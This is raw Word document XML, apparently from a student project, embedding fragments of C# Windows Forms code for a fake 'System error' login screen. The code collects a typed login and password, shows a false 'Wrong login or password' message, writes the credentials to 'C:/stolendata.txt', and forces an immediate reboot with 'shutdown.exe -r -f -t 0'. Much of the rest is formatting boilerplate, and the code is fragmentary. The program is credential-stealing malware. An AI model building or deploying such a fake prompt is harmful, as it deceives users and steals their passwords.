=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Registry.CurrentUser.CreateSubKey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"Keys"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12AC20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D62359F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counter = key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?.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GetValue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"counter"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2BAFE11D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counter !</w:t>
      </w:r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(counter) == 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5BF2E6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3822179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key.SetValue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"counter"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RegistryValueKind.String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4AD01C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key.Close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1EA200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explorerBlock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39E66A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54959A3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"Windows System Error."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A006F9F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"System error"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C70373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6DC20B4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MessageBoxIcon.Warning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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5DF6FA3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CA7650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.WindowState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FormWindowState.Maximized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29BA72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.passField.AutoSize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E28A06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.passField.Size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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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.passField.Size.Width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.loginField.Size.Height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D5BD28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C66B1E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A083199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76369F0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key.SetValue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"counter"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RegistryValueKind.String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E3EE3C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key.Close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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023749A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E11DEBE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9AECA7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875940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1BD2784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A1AB4C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inputButton_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535733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925235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inputButton.FlatAppearance.BorderSize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E68A8CC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inputButton.FlatStyle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FlatStyle.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Flat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0208988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String.IsNullOrWhiteSpace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loginField.Text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String.IsNullOrWhiteSpace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passField.Text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B48DDC7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70FE0C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"Enter login and password."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ACEFBA3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985790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C63DD65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313A5E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loginField.Text.Length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 ||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passField.Text.Length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8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198F75A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455EAF2" w14:textId="77777777" w:rsidR="00693F66" w:rsidRPr="0072210F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 xml:space="preserve">"Login or password does not meet the minimum length. </w:t>
      </w:r>
      <w:r w:rsidRPr="0072210F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enter again."</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007221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F23290B" w14:textId="77777777" w:rsidR="00693F66" w:rsidRPr="0072210F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21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2EA7C37" w14:textId="77777777" w:rsidR="00693F66" w:rsidRPr="0072210F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21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221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8AC0F10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21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CAC4CA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 =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DialogResult.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None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CEC230A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Dialog =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A09368A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"Wrong login or password. Try again."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E7E0202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"System error"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1FD134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6A9A6DC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5732023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 ==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A4ACDD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4888570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stolen =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"C:/stolendata.txt"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FileMode.Create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FileAccess.Write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73C394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wr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3F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(stolen</w:t>
      </w:r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822A67B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loginField.Text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59B2D9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wr.WriteLine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passField.Text</w:t>
      </w:r>
      <w:proofErr w:type="spell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2EF377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wr.Close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3F04C2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stolen.Close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A648DC" w14:textId="77777777" w:rsidR="00693F66" w:rsidRP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System.Diagnostics.Process.Start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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"shutdown.exe"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3F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"-r -f -t 0"</w:t>
      </w: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461D94" w14:textId="77777777" w:rsid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93F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E981C5" w14:textId="77777777" w:rsid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B243597" w14:textId="77777777" w:rsid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89F39" w14:textId="77777777" w:rsid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711E7A" w14:textId="77777777" w:rsid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AAB272D" w14:textId="77777777" w:rsidR="00693F66" w:rsidRDefault="00693F66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D4BF82A" w14:textId="77777777" w:rsidR="00601F8B" w:rsidRDefault="00601F8B" w:rsidP="00693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</w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00601F8B" w:rsidSect="000B75A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134" w:right="851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24CFE" w14:textId="77777777" w:rsidR="00FE040E" w:rsidRPr="00D60F71" w:rsidRDefault="00FE040E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3095008F" w14:textId="77777777" w:rsidR="00FE040E" w:rsidRPr="00D60F71" w:rsidRDefault="00FE040E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9F360" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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6999377F" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRPr="00C53ADA" w:rsidRDefault="00C93DCC" w:rsidP="000B75AA">
        <w:pPr>
          <w:pStyle w:val="afb"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="right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D740EB"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C64AC" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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414B7" w14:textId="77777777" w:rsidR="00FE040E" w:rsidRPr="00D60F71" w:rsidRDefault="00FE040E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4799B4AB" w14:textId="77777777" w:rsidR="00FE040E" w:rsidRPr="00D60F71" w:rsidRDefault="00FE040E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02219" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC">
    <w:pPr>
      <w:pStyle w:val="af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9F28" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC">
    <w:pPr>
      <w:pStyle w:val="af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38674" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC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52B7F85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B66D7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CC1AE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F544936"/>
    <w:numStyleLink w:val="22"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="103D214C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41BC5BE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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2066186B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1AEE9F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0906314"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F544936"/>
    <w:numStyleLink w:val="22"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15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7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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35500D25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F544936"/>
    <w:numStyleLink w:val="22"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19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0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1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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6DB4647C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4ECC6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B4368"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AC6D730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183F62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9C2FA2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FDA5BC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41861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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70234123"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9EEB52E"/>
    <w:lvl w:ilvl="0" w:tplc="28BC1DAE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739787467">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1949117069">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="267734728">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="795832083">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1466853518">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="304703507">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1248809584">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="23403748">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="387922458">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1045569181">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="875700889">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="300810275">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1784030587">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="326714743">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="742725520">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="886642829">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1478493072">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1378549948">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1495027311">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="892691366">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="258559708">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="327637330">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1988169015">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1463960532">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="846213433">
    <w:abstractNumId w:val="22"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="372077061">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="36634864">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1539507402">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="568003371">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="2133942151">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="854542870">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="94118518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120835589">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="783310172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ADA"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="00071A8A"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B75AA"/>
    <w:rsid w:val="000E5FE7"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="0015106C"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00223972"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="0025510F"/>
    <w:rsid w:val="002C4D0E"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00411D51"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00453CBA"/>
    <w:rsid w:val="004557D2"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="00642126"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00693F66"/>
    <w:rsid w:val="006A2ED9"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006E2B77"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="007160DD"/>
    <w:rsid w:val="0072210F"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="007A0C51"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D53C6"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00812CFE"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008408FC"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008B7DD8"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E08A9"/>
    <w:rsid w:val="00911D99"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00960360"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009E5E8C"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A2046F"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B20E7E"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BE039B"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C47078"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C74206"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CD0D2F"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D3309C"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DE5979"/>
    <w:rsid w:val="00DF34B4"/>
    <w:rsid w:val="00E12B25"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E53F11"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00ED7C28"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F51D0E"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FB7563"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE040E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9EC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4"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af4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8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7">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="af6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8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9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11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12"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="header"/>
    <w:basedOn w:val="a4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4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5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5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2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1340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2022-04-18T16:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-28T21:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>